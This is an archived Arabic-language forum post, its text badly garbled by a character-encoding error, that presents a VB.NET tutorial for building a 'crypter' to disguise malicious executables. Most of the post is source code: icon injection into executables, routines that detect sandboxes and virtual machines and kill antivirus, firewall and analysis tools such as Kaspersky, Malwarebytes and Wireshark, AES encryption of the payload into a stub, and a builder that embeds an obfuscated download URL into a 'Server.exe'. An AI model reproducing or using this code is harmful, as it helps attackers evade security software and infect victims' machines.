Follow us on Twitter Follow us on Facebook Watch us on YouTube





ÇáÚæÏÉ   development-point > [ ÇáÃÞÓÜÜÜÇã ÇáÃÏÇÑíÉ ] > ÞÓã ÇáãæÇÖíÚ ÇáãõßÑÑÉ æÇáãõÎÇáÝÉ > ÇáÃÑÔíÝ


[ äÞÇÔ ] ßíÝíÉ Úãá ÈÑäÇãÌ ÊÔÝíÑ ÈÎæÇÕ ÌÏíÏÉ | ÈÎæÇÑÒãíÇÊ ÌÏíÏå | vb.net | áßá ãÍÊÑÝí ÇáÊÔÝíÑ æ ÇáÈÑã

ãÑÍÈÇ Èßá ÇÚÖÇÁ æ ÒæÇÑ ãäÊÏí ÇáÏíÝ ÈæíäÊ ÊÍíå ØíÈå æ ÈÚÏ ,,, Çáíæã ÎØÑÊ ÈÈÇáí ÝßÑÉ æ ÇÑÌæ ÊØæíÑåÇ Ýí ãäÊÏí ÇáÊØæíÑ ÇáßÈíÑ ßíÝíÉ Úãá ÈÑäÇãÌ ÊÔÝíÑ

 
 
ÃÏæÇÊ ÇáãæÖæÚ ÇäæÇÚ ÚÑÖ ÇáãæÖæÚ
ÞÏíã ãäÐ /10-31-2012, 02:44 PM   #1
aaqassam
Creator

ÇáÕæÑÉ ÇáÑãÒíÉ aaqassam

aaqassam ÛíÑ ãÊæÇÌÏ ÍÇáíÇð

 ÑÞã ÇáÚÖæíÉ : 9
 ÊÇÑíÎ ÇáÊÓÌíá : Oct 2012
 ÇáÌäÓ : ~ ÐßÑ
 ÇáãÔÇÑßÇÊ : 30
 ÇáäÞÇØ : 27
 ÞæÉ ÇáÊÞííã : aaqassam is on a distinguished road

ÔßÑÇð: 0
Êã ÔßÑå 0 ãÑÉ Ýí 0 ãÔÇÑßÉ
Wink [ äÞÇÔ ] ßíÝíÉ Úãá ÈÑäÇãÌ ÊÔÝíÑ ÈÎæÇÕ ÌÏíÏÉ | ÈÎæÇÑÒãíÇÊ ÌÏíÏå | vb.net | áßá ãÍÊÑÝí ÇáÊÔÝíÑ æ ÇáÈÑã

[ , äÞÇÔ , ] , ßíÝíÉ , Úãá , ÈÑäÇãÌ , ÊÔÝíÑ , ÈÎæÇÕ , ÌÏíÏÉ , | , ÈÎæÇÑÒãíÇÊ , ÌÏíÏå , | , vb.net , | , áßá , ãÍÊÑÝí , ÇáÊÔÝíÑ , æ , ÇáÈÑãÌå

[ äÞÇÔ ] ßíÝíÉ Úãá ÈÑäÇãÌ ÊÔÝíÑ ÈÎæÇÕ ÌÏíÏÉ | ÈÎæÇÑÒãíÇÊ ÌÏíÏå | vb.net | áßá ãÍÊÑÝí ÇáÊÔÝíÑ æ ÇáÈÑã besml.gif

ãÑÍÈÇ Èßá ÇÚÖÇÁ æ ÒæÇÑ ãäÊÏí ÇáÏíÝ ÈæíäÊ
ÊÍíå ØíÈå æ ÈÚÏ ,,,
Çáíæã ÎØÑÊ ÈÈÇáí ÝßÑÉ æ ÇÑÌæ ÊØæíÑåÇ Ýí ãäÊÏí ÇáÊØæíÑ ÇáßÈíÑ

[ äÞÇÔ ] ßíÝíÉ Úãá ÈÑäÇãÌ ÊÔÝíÑ ÈÎæÇÕ ÌÏíÏÉ | ÈÎæÇÑÒãíÇÊ ÌÏíÏå | vb.net | áßá ãÍÊÑÝí ÇáÊÔÝíÑ æ ÇáÈÑã 1339718464373.png

ßíÝíÉ Úãá ÈÑäÇãÌ ÊÔÝíÑ ÈÎæÇÕ ÌÏíÏå æ ÑÇÆÚå
ÈÏæä ãÇ ÇØæá Úáíßã åÇ ØÑÍ ãÇ ÊæÕáÊ Çíå
æ ÇÑíÏ ãäßã ØÑÍ ÇÝßÇÑßã ÇáÊØæíÑíå
[ äÞÇÔ ] ßíÝíÉ Úãá ÈÑäÇãÌ ÊÔÝíÑ ÈÎæÇÕ ÌÏíÏÉ | ÈÎæÇÑÒãíÇÊ ÌÏíÏå | vb.net | áßá ãÍÊÑÝí ÇáÊÔÝíÑ æ ÇáÈÑã 58176002.gif
[ äÞÇÔ ] ßíÝíÉ Úãá ÈÑäÇãÌ ÊÔÝíÑ ÈÎæÇÕ ÌÏíÏÉ | ÈÎæÇÑÒãíÇÊ ÌÏíÏå | vb.net | áßá ãÍÊÑÝí ÇáÊÔÝíÑ æ ÇáÈÑã drawingseparator.gif

æÇÌåå ÇáÈÑäÇãÌ ÇáãÊÚÏÏ ÇáÎæÇÕ
=================================
æÌåå ÇáÇæáí
ÚÈÇÑÉ Úä
* ÊÔÝíÑ Çí ÓíÑÝÑ + ÎÇÕíå ÊÛííÑ ÇíÞæäå | ÇÐÇ ÇÏÑÊ ÊÛííÑåÇ
[ äÞÇÔ ] ßíÝíÉ Úãá ÈÑäÇãÌ ÊÔÝíÑ ÈÎæÇÕ ÌÏíÏÉ | ÈÎæÇÑÒãíÇÊ ÌÏíÏå | vb.net | áßá ãÍÊÑÝí ÇáÊÔÝíÑ æ ÇáÈÑã 31102012120646.gif

[ äÞÇÔ ] ßíÝíÉ Úãá ÈÑäÇãÌ ÊÔÝíÑ ÈÎæÇÕ ÌÏíÏÉ | ÈÎæÇÑÒãíÇÊ ÌÏíÏå | vb.net | áßá ãÍÊÑÝí ÇáÊÔÝíÑ æ ÇáÈÑã 58176002.gif
ÇáæÌå ÇáËÇäí
ÚÈÇÑÉ Úä ÇÖÇÝå ÎæÇÕ ÇáÊÎØí

[ äÞÇÔ ] ßíÝíÉ Úãá ÈÑäÇãÌ ÊÔÝíÑ ÈÎæÇÕ ÌÏíÏÉ | ÈÎæÇÑÒãíÇÊ ÌÏíÏå | vb.net | áßá ãÍÊÑÝí ÇáÊÔÝíÑ æ ÇáÈÑã 31102012120715.gif

[ äÞÇÔ ] ßíÝíÉ Úãá ÈÑäÇãÌ ÊÔÝíÑ ÈÎæÇÕ ÌÏíÏÉ | ÈÎæÇÑÒãíÇÊ ÌÏíÏå | vb.net | áßá ãÍÊÑÝí ÇáÊÔÝíÑ æ ÇáÈÑã 58176002.gif

ÇáæÌå ÇáËÇáË
ÚÈÇÑÉ Úä Úãá ÏæäáææÏÑ

[ äÞÇÔ ] ßíÝíÉ Úãá ÈÑäÇãÌ ÊÔÝíÑ ÈÎæÇÕ ÌÏíÏÉ | ÈÎæÇÑÒãíÇÊ ÌÏíÏå | vb.net | áßá ãÍÊÑÝí ÇáÊÔÝíÑ æ ÇáÈÑã 31102012120736.gif

[ äÞÇÔ ] ßíÝíÉ Úãá ÈÑäÇãÌ ÊÔÝíÑ ÈÎæÇÕ ÌÏíÏÉ | ÈÎæÇÑÒãíÇÊ ÌÏíÏå | vb.net | áßá ãÍÊÑÝí ÇáÊÔÝíÑ æ ÇáÈÑã 58176002.gif
ÇßæÇÏ ÇáÈÑäÇãÌ
ÍÊí ÇáÇä
[INFO]ãÚ ÊÛííÑ X Úáí ÍÓÈ ÇáÑÞã Çááí ãæÌæÏ ÚäÏß Ýí ÇáãÔÑæÚ | ÇÐÇ ÒÑ Çæ ÊßÓÊ Çæ ÇáÎ ...........[/INFO]
1-Ýí ÍÏË ÖÛØ ÒÑ ÇÎÊíÇÑ ÇáÓíÑÝÑ | ÇáãáÝ ÇáÊäÝíÐí | EXE

ßæÏ:

With OpenFileDialog1
.FileName = ""
.Filter = "Executable(*.exe)|*.exe"
.Title = "CrYpTeR V2.3 | M.Magdy DZ | HaCkEr "
.ShowDialog()
TextBoxX.Text = .FileName
infectedfile = TextBoxX.Text
End With
If OpenFileDialogX.ShowDialog(Me) = DialogResult.OK Then
TextBoxX.Text = String.Empty
TextBoxX.Text = OpenFileDialog1.FileName
End If
áÇÎÊíÇÑ ÇáãáÝÇÊ ÇáÊäÝíÐíÉ

[ äÞÇÔ ] ßíÝíÉ Úãá ÈÑäÇãÌ ÊÔÝíÑ ÈÎæÇÕ ÌÏíÏÉ | ÈÎæÇÑÒãíÇÊ ÌÏíÏå | vb.net | áßá ãÍÊÑÝí ÇáÊÔÝíÑ æ ÇáÈÑã 58176002.gif
2-Ýí ÍÏË ÖÛØ ÒÑ áÇÎÊíÇÑ ÇáÇíÞæäå
ßæÏ:
Dim ooo As New OpenFileDialog
ooo.DefaultExt = "ico"
ooo.Filter = "Icon Files (*.ico*)|*.ico*"
ooo.FilterIndex = 1
ooo.FileName = ""
ooo.Title = "CrYpTeR V2.3 | M.Magdy DZ | HaCkEr OFF LiNE"
If ooo.ShowDialog(Me) = 1 Then
Me.PictureBoxX.Image = Image.FromFile(ooo.FileName)
TextBoxX.Text = ooo.FileName
End If
æ Ýí ÍÏË CheckBoxX.Checked

ßæÏ:
If CheckBoxX.Checked = True Then
TextBoxX.Enabled = True
ButtonX.Enabled = True
Else
TextBoxX.Enabled = False
ButtonX.Enabled = False
End If

[ äÞÇÔ ] ßíÝíÉ Úãá ÈÑäÇãÌ ÊÔÝíÑ ÈÎæÇÕ ÌÏíÏÉ | ÈÎæÇÑÒãíÇÊ ÌÏíÏå | vb.net | áßá ãÍÊÑÝí ÇáÊÔÝíÑ æ ÇáÈÑã 58176002.gif
3- ÇÖÇÝå ßáÇÓ ÌÏíÏ | áÚãáíÉ ÊÛííÑ ÇáÇíÞæäÇÊ ( áÊÓíÑ ÈÇáÔßá ÇáÕÍíÍ )

ßæÏ:
Option Strict On
Option Explicit On
Option Infer On
Imports System.Runtime.InteropServices
Imports System.Security
Public Class IconChanger
_
Private Class NativeMethods
_
Public Shared Function BeginUpdateResource( _
ByVal fileName As String, _
ByVal deleteExistingResources As Boolean) As IntPtr
End Function
_
Public Shared Function UpdateResource( _
ByVal hUpdate As IntPtr, _
ByVal type As IntPtr, _
ByVal name As IntPtr, _
ByVal language As Short, _
_
ByVal data() As Byte, _
ByVal dataSize As Integer) As Boolean
End Function
_
Public Shared Function EndUpdateResource( _
ByVal hUpdate As IntPtr, _
ByVal discard As Boolean) As Boolean
End Function
End Class
_
Private Structure ICONDIR
Public Reserved As UShort
Public Type As UShort
Public Count As UShort
End Structure
_
Private Structure ICONDIRENTRY
Public Width As Byte
Public Height As Byte
Public ColorCount As Byte
Public Reserved As Byte
Public Planes As UShort
Public BitCount As UShort
Public BytesInRes As Integer
Public ImageOffset As Integer
End Structure
_
Private Structure BITMAPINFOHEADER
Public Size As UInteger
Public Width As Integer
Public Height As Integer
Public Planes As UShort
Public BitCount As UShort
Public Compression As UInteger
Public SizeImage As UInteger
Public XPelsPerMeter As Integer
Public YPelsPerMeter As Integer
Public ClrUsed As UInteger
Public ClrImportant As UInteger
End Structure
_
Private Structure GRPICONDIRENTRY
Public Width As Byte
Public Height As Byte
Public ColorCount As Byte
Public Reserved As Byte
Public Planes As UShort
Public BitCount As UShort
Public BytesInRes As Integer
Public ID As UShort
End Structure
Public Shared Sub InjectIcon(ByVal exeFileName As String, ByVal iconFileName As String)
InjectIcon(exeFileName, iconFileName, 1, 1)
End Sub
Public Shared Sub InjectIcon(ByVal exeFileName As String, ByVal iconFileName As String, ByVal iconGroupID As UInteger, ByVal iconBaseID As UInteger)
Const RT_ICON As UInteger = 3UI
Const RT_GROUP_ICON As UInteger = 14UI
Dim iconFile As IconFile = iconFile.FromFile(iconFileName)
Dim hUpdate = NativeMethods.BeginUpdateResource(exeFileName, False)
Dim data = iconFile.CreateIconGroupData(iconBaseID)
NativeMethods.UpdateResource(hUpdate, New IntPtr(RT_GROUP_ICON), New IntPtr(iconGroupID), 0, data, data.Length)
For i = 0 To iconFile.ImageCount - 1
Dim image = iconFile.ImageData(i)
NativeMethods.UpdateResource(hUpdate, New IntPtr(RT_ICON), New IntPtr(iconBaseID + i), 0, image, image.Length)
Next
NativeMethods.EndUpdateResource(hUpdate, False)
End Sub
Private Class IconFile
Private iconDir As New ICONDIR
Private iconEntry() As ICONDIRENTRY
Private iconImage()() As Byte
Public ReadOnly Property ImageCount() As Integer
Get
Return iconDir.Count
End Get
End Property
Public ReadOnly Property ImageData(ByVal index As Integer) As Byte()
Get
Return iconImage(index)
End Get
End Property

Private Sub New()

End Sub
Public Shared Function FromFile(ByVal filename As String) As IconFile
Dim instance As New IconFile
Dim fileBytes() As Byte = IO.File.ReadAllBytes(filename)
Dim pinnedBytes = GCHandle.Alloc(fileBytes, GCHandleType.Pinned)
instance.iconDir = DirectCast(Marshal.PtrToStructure(pinnedBytes.Addr OfPinnedObject, GetType(ICONDIR)), ICONDIR)
instance.iconEntry = New ICONDIRENTRY(instance.iconDir.Count - 1) {}
instance.iconImage = New Byte(instance.iconDir.Count - 1)() {}
Dim offset = Marshal.SizeOf(instance.iconDir)
Dim iconDirEntryType = GetType(ICONDIRENTRY)
Dim size = Marshal.SizeOf(iconDirEntryType)
For i = 0 To instance.iconDir.Count - 1
Dim entry = DirectCast(Marshal.PtrToStructure(New IntPtr(pinnedBytes.AddrOfPinnedObject.ToInt64 + offset), iconDirEntryType), ICONDIRENTRY)
instance.iconEntry(i) = entry
instance.iconImage(i) = New Byte(entry.BytesInRes - 1) {}
Buffer.BlockCopy(fileBytes, entry.ImageOffset, instance.iconImage(i), 0, entry.BytesInRes)
offset += size
Next
pinnedBytes.Free()
Return instance
End Function
Public Function CreateIconGroupData(ByVal iconBaseID As UInteger) As Byte()
Dim sizeOfIconGroupData As Integer = Marshal.SizeOf(GetType(ICONDIR)) + Marshal.SizeOf(GetType(GRPICONDIRENTRY)) * ImageCount
Dim data(sizeOfIconGroupData - 1) As Byte
Dim pinnedData = GCHandle.Alloc(data, GCHandleType.Pinned)
Marshal.StructureToPtr(iconDir, pinnedData.AddrOfPinnedObject, False)
Dim offset = Marshal.SizeOf(iconDir)
For i = 0 To ImageCount - 1
Dim grpEntry As New GRPICONDIRENTRY
Dim bitmapheader As New BITMAPINFOHEADER
Dim pinnedBitmapInfoHeader = GCHandle.Alloc(bitmapheader, GCHandleType.Pinned)
Marshal.Copy(ImageData(i), 0, pinnedBitmapInfoHeader.AddrOfPinnedObject, Marshal.SizeOf(GetType(BITMAPINFOHEADER)))
pinnedBitmapInfoHeader.Free()
grpEntry.Width = iconEntry(i).Width
grpEntry.Height = iconEntry(i).Height
grpEntry.ColorCount = iconEntry(i).ColorCount
grpEntry.Reserved = iconEntry(i).Reserved
grpEntry.Planes = bitmapheader.Planes
grpEntry.BitCount = bitmapheader.BitCount
grpEntry.BytesInRes = iconEntry(i).BytesInRes
grpEntry.ID = CType(iconBaseID + i, UShort)
Marshal.StructureToPtr(grpEntry, New IntPtr(pinnedData.AddrOfPinnedObject.ToInt64 + offset), False)
offset += Marshal.SizeOf(GetType(GRPICONDIRENTRY))
Next
pinnedData.Free()
Return data
End Function
End Class
End Class

[ äÞÇÔ ] ßíÝíÉ Úãá ÈÑäÇãÌ ÊÔÝíÑ ÈÎæÇÕ ÌÏíÏÉ | ÈÎæÇÑÒãíÇÊ ÌÏíÏå | vb.net | áßá ãÍÊÑÝí ÇáÊÔÝíÑ æ ÇáÈÑã 58176002.gif
4 - ÃÖÇÝå ãæÏíá ÌÏíÏ áÇßæÇÏ ÇáÊÎØí

ßæÏ:

Imports Microsoft.Win32

Module Antis
Dim Devices As Object, Grafikadapter As String, RegionA As String = "SELECT * FROM Win32_VideoController"
Dim regPID As RegistryKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\Microso ft\Windows NT\CurrentVersion", False)
Dim pid As Object = regPID.GetValue("ProductId")
Dim id As String = "76487-337-8429955-22614"

Public Function antiKAV() As Boolean
On Error GoTo error1
If Process.GetProcessesByName("avp").Length >= 1 Then
Return True
Else
Return False
End If
Exit Function
error1:
End
End Function

Public Function antiSandboxie() As Boolean
On Error GoTo error1
If Process.GetProcessesByName("SbieSvc").Length >= 1 Then
Return True
Else
Return False
End If
Exit Function
error1:
End
End Function



Public Function antiAnubis2() As Boolean
On Error GoTo error1
If pid = id Then
Return True
Else
Return False
End If
Exit Function
error1:
End
End Function

Public Function AntiVirtualBox() As Boolean
On Error GoTo error1
Call getDevices()

Select Case Grafikadapter
Case "VirtualBox Graphics Adapter"
Return True
Case Else
Return False
End Select
Exit Function
error1:
End
End Function

Public Function AntiVmWare() As Boolean
On Error GoTo error1
Call getDevices()

Select Case Grafikadapter
Case "VMware SVGA II"
Return True
Case Else
Return False
End Select
Exit Function
error1:
End
End Function

Public Function AntiVirtualPC() As Boolean
On Error GoTo error1
Call getDevices()

Select Case Grafikadapter
Case "VM Additions S3 Trio32/64"
Return True
Case Else
Return False
End Select
Exit Function
error1:
End
End Function

Private Sub getDevices()
On Error GoTo error1
Devices = GetObject("winmgmts:").ExecQuery(RegionA)
For Each AdaptList In Devices
Grafikadapter = AdaptList.Description
Next
Exit Sub
error1:
End
End Sub
'------------------------Keyscrambler----------------------------
Sub AntiKeyscrambler()
Dim generaldee As Process() = Process.GetProcesses
Dim i As Integer
For i = 0 To generaldee.Length - 1
Select Case Strings.LCase(generaldee(i).ProcessName)
Case "keyscrambler"
generaldee(i).Kill()
Case Else
End Select
Next
End Sub

'------------------------Wireshark----------------------------
Sub AntiWireshark()
Dim generaldee As Process() = Process.GetProcesses
Dim i As Integer
For i = 0 To generaldee.Length - 1
Select Case Strings.LCase(generaldee(i).ProcessName)
Case "wireshark"
generaldee(i).Kill()
Case Else
End Select
Next
End Sub

'----------------------------Anubis--------------------------------
Sub AntiAnubis()
Dim generaldee As Process() = Process.GetProcesses
Dim i As Integer
For i = 0 To generaldee.Length - 1
Select Case Strings.LCase(generaldee(i).ProcessName)
Case "anubis"
generaldee(i).Kill()
Case Else
End Select
Next
End Sub

'------------------------Malwarebytes----------------------------
Sub AntiMalwarebytes()
Dim generaldee As Process() = Process.GetProcesses
Dim i As Integer
For i = 0 To generaldee.Length - 1
Select Case Strings.LCase(generaldee(i).ProcessName)
Case "mbam"
generaldee(i).Kill()
Case Else
End Select
Next
End Sub

'------------------------Kaspersky----------------------------
Sub AntiKaspersky()
Dim generaldee As Process() = Process.GetProcesses
Dim i As Integer
For i = 0 To generaldee.Length - 1
Select Case Strings.LCase(generaldee(i).ProcessName)
Case "avp"
generaldee(i).Kill()
Case Else
End Select
Next
End Sub

'-----------------------Ollydbg---------------------------------
Sub AntiOllydbg()
Dim generaldee As Process() = Process.GetProcesses
Dim i As Integer
For i = 0 To generaldee.Length - 1
Select Case Strings.LCase(generaldee(i).ProcessName)
Case "ollydbg"
generaldee(i).Kill()
Case Else
End Select
Next
End Sub

'-----------------------Outpost---------------------------------
Sub AntiOutpost()
Dim generaldee As Process() = Process.GetProcesses
Dim i As Integer
For i = 0 To generaldee.Length - 1
Select Case Strings.LCase(generaldee(i).ProcessName)
Case "outpost"
generaldee(i).Kill()
Case Else
End Select
Next
End Sub

'-----------------------Norman------------------------------
Sub AntiNorman()
Dim generaldee As Process() = Process.GetProcesses
Dim i As Integer
For i = 0 To generaldee.Length - 1
Select Case Strings.LCase(generaldee(i).ProcessName)
Case "npfmsg"
generaldee(i).Kill()
Case Else
End Select
Next
End Sub

'-----------------------Bit Defender------------------------------
Sub AntiBitDefender()
Dim generaldee As Process() = Process.GetProcesses
Dim i As Integer
For i = 0 To generaldee.Length - 1
Select Case Strings.LCase(generaldee(i).ProcessName)
Case "bdagent"
generaldee(i).Kill()
Case Else
End Select
Next
End Sub

'-----------------------NOD32------------------------------
Sub AntiNOD32()
Dim generaldee As Process() = Process.GetProcesses
Dim i As Integer
For i = 0 To generaldee.Length - 1
Select Case Strings.LCase(generaldee(i).ProcessName)
Case "egui"
generaldee(i).Kill()
Case Else
End Select
Next
End Sub

'-----------------------Zone Alarm------------------------------
Sub AntiZoneAlarm()
Dim generaldee As Process() = Process.GetProcesses
Dim i As Integer
For i = 0 To generaldee.Length - 1
Select Case Strings.LCase(generaldee(i).ProcessName)
Case "zlclient"
generaldee(i).Kill()
Case Else
End Select
Next
End Sub
End Module
[ äÞÇÔ ] ßíÝíÉ Úãá ÈÑäÇãÌ ÊÔÝíÑ ÈÎæÇÕ ÌÏíÏÉ | ÈÎæÇÑÒãíÇÊ ÌÏíÏå | vb.net | áßá ãÍÊÑÝí ÇáÊÔÝíÑ æ ÇáÈÑã 58176002.gif
5 - æ Ýí ÍÏË ÖÛØ ÇáÒÑ ááÊÔÝíÑ Crypt Button
ßæÏ:
Dim key As String = "3p699792sq691s854374n76841899n6p867nqr2r424770743 6n4776oo38083sn"
Dim Splitt As String = "8bda087801ee923b02ff7a5447b6c9b8416da33aed3536bc3 aad1bf463442db5"
Dim Cryptfile As String
FileOpen(1, ("stub.exe"), OpenMode.Binary)
stub = Space(LOF(1))
FileGet(1, stub)
FileClose(1)
FileOpen(1, (TextBoxX.Text), OpenMode.Binary)
infectedfile = Space(LOF(1))
FileGet(1, infectedfile)
FileClose(1)
Cryptfile = infectedfile
Dim oAesProvider As New RijndaelManaged
Dim btClear() As Byte
Dim btSalt() As Byte = New Byte() {1, 2, 3, 4, 5, 6, 7, 8}
Dim oKeyGenerator As New Rfc2898DeriveBytes(key, btSalt)
oAesProvider.Key = oKeyGenerator.GetBytes(oAesProvider.Key.Length)
oAesProvider.IV = oKeyGenerator.GetBytes(oAesProvider.IV.Length)
Dim ms As New IO.MemoryStream
Dim cs As New CryptoStream(ms, _
oAesProvider.CreateEncryptor(), _
CryptoStreamMode.Write)
btClear = System.Text.Encoding.UTF8.GetBytes(Cryptfile)
cs.Write(btClear, 0, btClear.Length)
cs.Close()
Cryptfile = Convert.ToBase64String(ms.ToArray)
FileOpen(1, (TextBoxX.Text & "-Crypted.exe"), OpenMode.Binary)
FilePut(1, stub)
FilePut(1, Splitt)
FilePut(1, Cryptfile)
FilePut(1, Splitt)
FileClose(1)
MsgBox("Error:")
MsgBox("File Crypted Succesfully", MsgBoxStyle.Information, "Success")
[ äÞÇÔ ] ßíÝíÉ Úãá ÈÑäÇãÌ ÊÔÝíÑ ÈÎæÇÕ ÌÏíÏÉ | ÈÎæÇÑÒãíÇÊ ÌÏíÏå | vb.net | áßá ãÍÊÑÝí ÇáÊÔÝíÑ æ ÇáÈÑã 58176002.gif
6- Ýí ÍÏË ÇáÝæÑã áææÏ
ßæÏ:
For Fadein = 0.0 To 1.1 Step 0.1
Me.Opacity = Fadein
Me.R e f r e s h()
Threading.Thread.Sleep(100)
Next
CheckBoxX.CheckState = CheckState.Indeterminate
[INFO]ãÚ ÇÒÇáå ÇáÝæÇÕá ãä ßáãå Me.R e f r e s h()[/INFO]

[ äÞÇÔ ] ßíÝíÉ Úãá ÈÑäÇãÌ ÊÔÝíÑ ÈÎæÇÕ ÌÏíÏÉ | ÈÎæÇÑÒãíÇÊ ÌÏíÏå | vb.net | áßá ãÍÊÑÝí ÇáÊÔÝíÑ æ ÇáÈÑã 58176002.gif
7- Ýí ÈÏÇíÉ ÝæÑã ÇáÈÑäÇãÌ
ßæÏ:
Imports System.Security.Cryptography
Imports System.IO
Imports System.Text
Imports System.Runtime.InteropServices
Imports System.CodeDom.Compiler
Public Class Form1
Dim infectedfile, stub As String
[ äÞÇÔ ] ßíÝíÉ Úãá ÈÑäÇãÌ ÊÔÝíÑ ÈÎæÇÕ ÌÏíÏÉ | ÈÎæÇÑÒãíÇÊ ÌÏíÏå | vb.net | áßá ãÍÊÑÝí ÇáÊÔÝíÑ æ ÇáÈÑã 58176002.gif
8- ÇÖÇÝå functions ÇáÎæÑÒãíÇÊ ÇáÊÔÝíÑíÉ
ßæÏ:
Public Shared Function StrToByteArray(ByVal str As String) As Byte()
Dim encoding As New System.Text.ASCIIEncoding()
Return encoding.GetBytes(str)
End Function
ßæÏ:
Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (ByVal Destination As Long, ByVal Source As Long, ByVal Length As Integer)
Function GetEOF(ByVal Path As String) As Long
Dim ByteArray() As Byte
Dim PE As Long, NumberOfSections As Integer
Dim BeginLastSection As Long
Dim RawSize As Long, RawOffset As Long
FileOpen(10, Path, OpenMode.Binary, OpenAccess.Default)
ReDim ByteArray(LOF(10) - 1)
FileGet(10, ByteArray)
FileClose(10)
Call CopyMemory(PE, ByteArray(&H3C), 4)
Call CopyMemory(NumberOfSections, ByteArray(PE + &H6), 2)
BeginLastSection = PE + &HF8 + ((NumberOfSections - 1) * &H28)
Call CopyMemory(RawSize, ByteArray(BeginLastSection + 16), 4)
Call CopyMemory(RawOffset, ByteArray(BeginLastSection + 20), 4)
GetEOF = RawSize + RawOffset
End Function
[ äÞÇÔ ] ßíÝíÉ Úãá ÈÑäÇãÌ ÊÔÝíÑ ÈÎæÇÕ ÌÏíÏÉ | ÈÎæÇÑÒãíÇÊ ÌÏíÏå | vb.net | áßá ãÍÊÑÝí ÇáÊÔÝíÑ æ ÇáÈÑã 58176002.gif
Ëã ÇÎíÑÇ æÇÌå Úãá ÇáÏæäáææÏÑ

ßæÏ:
Dim stubX, textX, textX As String
Ýí ÍÏË ÖÛØ ÇáÒÑ áÚãá ÇáÏæäáææÏÑ

ßæÏ:
If TextBoxX.Text = "" Then
MsgBox("Oops, Looks like you forgot the URL!")
Exit Sub
End If
If TextBoxX.Text = "" Then
MsgBox("Oops, Looks like you forgot the filename!")
Exit Sub
End If
Dim i As Short
Dim KeyChar As Integer
KeyChar = Asc("++")
For i = 1 To Len(TextBoxX.Text)
text1 &= Chr(KeyChar Xor Asc(Mid(TextBoxX.Text, i, 1)))
Next
KeyChar = Asc("++")
For i = 1 To Len(TextBoxX.Text)
text2 &= Chr(KeyChar Xor Asc(Mid(TextBoxX.Text, i, 1)))
Next
Const FileSplit = "@72389@"
FileOpen(1, Application.StartupPath & "\StubX.exe", OpenMode.Binary, OpenAccess.Read, OpenShare.Default)
stub = Space(LOF(1))
FileGet(1, stub)
FileClose(1)
If File.Exists("server.exe") Then
My.Computer.FileSystem.DeleteFile("server.exe")
End If
FileOpen(1, Application.StartupPath & "\Server.exe", OpenMode.Binary, OpenAccess.ReadWrite, OpenShare.Default)
FilePut(1, stub & FileSplit & text1 & FileSplit & text2)
FileClose(1)
MsgBox("Server.exe file created!" + vbNewLine + "Bye Bye!")
[ äÞÇÔ ] ßíÝíÉ Úãá ÈÑäÇãÌ ÊÔÝíÑ ÈÎæÇÕ ÌÏíÏÉ | ÈÎæÇÑÒãíÇÊ ÌÏíÏå | vb.net | áßá ãÍÊÑÝí ÇáÊÔÝíÑ æ ÇáÈÑã 58176002.gif
ÇäÊíåäÇ ÈÍãÏ ááå
æ ãÓÊäí ÇÝßÇÑßã ÇáÊØæíÑíå
( ÇßæÇÏ ÇáÓÊÈ | áÈÑäÇãÌ ÇáÊÔÝíÑ | æ áÚãá ÇáÏæäáææÏÑ | ÊäÞÕäí )

ßÇä ãÚßã ÇÎæßã
M.Magdy DZ
[ äÞÇÔ ] ßíÝíÉ Úãá ÈÑäÇãÌ ÊÔÝíÑ ÈÎæÇÕ ÌÏíÏÉ | ÈÎæÇÑÒãíÇÊ ÌÏíÏå | vb.net | áßá ãÍÊÑÝí ÇáÊÔÝíÑ æ ÇáÈÑã 7b66f2beaf.gif

ÇáãÕÏÑ: development-point - ááãÒíÏ ÊÇÈÚ : ÇáÃÑÔíÝ


F krha D ;dtdm ulg fvkhl[ jatdv fo,hw []d]m | fo,hv.ldhj []d]i vb>net g;g lpjvtd hgjatdv , hgfvl hgfvl[i






 
 

ãæÇÞÚ ÇáäÔÑ (ÇáãÝÖáÉ)

ÇáßáãÇÊ ÇáÏáÇáíÉ (Tags)
[, äÞÇÔ, ], ßíÝíÉ, Úãá, ÈÑäÇãÌ, ÊÔÝíÑ, ÈÎæÇÕ, ÌÏíÏÉ, |, ÈÎæÇÑÒãíÇÊ, ÌÏíÏå, |, vb.net, |, áßá, ãÍÊÑÝí, ÇáÊÔÝíÑ, æ, ÇáÈÑãÌå

ÌÏíÏ ÇáÃÑÔíÝ


ÇáÐíä íÔÇåÏæä ãÍÊæì ÇáãæÖæÚ ÇáÂä : 1 ( ÇáÃÚÖÇÁ 0 æÇáÒæÇÑ 1)
 

ÊÚáíãÇÊ ÇáãÔÇÑßÉ
áÇ ÊÓÊØíÚ ÅÖÇÝÉ ãæÇÖíÚ ÌÏíÏÉ
áÇ ÊÓÊØíÚ ÇáÑÏ Úáì ÇáãæÇÖíÚ
áÇ ÊÓÊØíÚ ÅÑÝÇÞ ãáÝÇÊ
áÇ ÊÓÊØíÚ ÊÚÏíá ãÔÇÑßÇÊß

BB code is ãÊÇÍÉ
ßæÏ [IMG] ãÊÇÍÉ
ßæÏ HTML ãÚØáÉ

ÇáÇäÊÞÇá ÇáÓÑíÚ

ÇáãæÇÖíÚ ÇáãÊÔÇÈåå ááãæÖæÚ: [ äÞÇÔ ] ßíÝíÉ Úãá ÈÑäÇãÌ ÊÔÝíÑ ÈÎæÇÕ ÌÏíÏÉ | ÈÎæÇÑÒãíÇÊ ÌÏíÏå | vb.net | áßá ãÍÊÑÝí ÇáÊÔÝíÑ æ ÇáÈÑã
ÇáãæÖæÚ ßÇÊÈ ÇáãæÖæÚ ÇáãäÊÏì ãÔÇÑßÇÊ ÂÎÑ ãÔÇÑßÉ
ÇáÃÕÏÇÑ ÇáÌÏíÏ ãä ÈÑäÇãÌ ÇáÊÔÝíÑ NaShMe CRypteR 3.0 ÈÎæÇÕ ããíÒÉ æÌÏíÏÉ SECURITY ÞÓã ÅÎÊÑÇÞ ÇáÃÌÜåÜÒå æÇáÃíÜãÜíÜáÇÊ 16 08-04-2013 05:54 PM
[ ØáÈ ] ÈÑäÇãÌ ÊÔÝíÑ ãÚ ÓÊ ÇÈ ÎÇÑÌí ( ãÕãã ÈáÛÉ vb 6 ) ÈÎæÇÕ ÞæíÉ MR:HACK ãÔÇßá æÍáæá ÅÎÊÑÇÞ ÇáÃÌåÒÉ 27 02-16-2013 06:23 PM
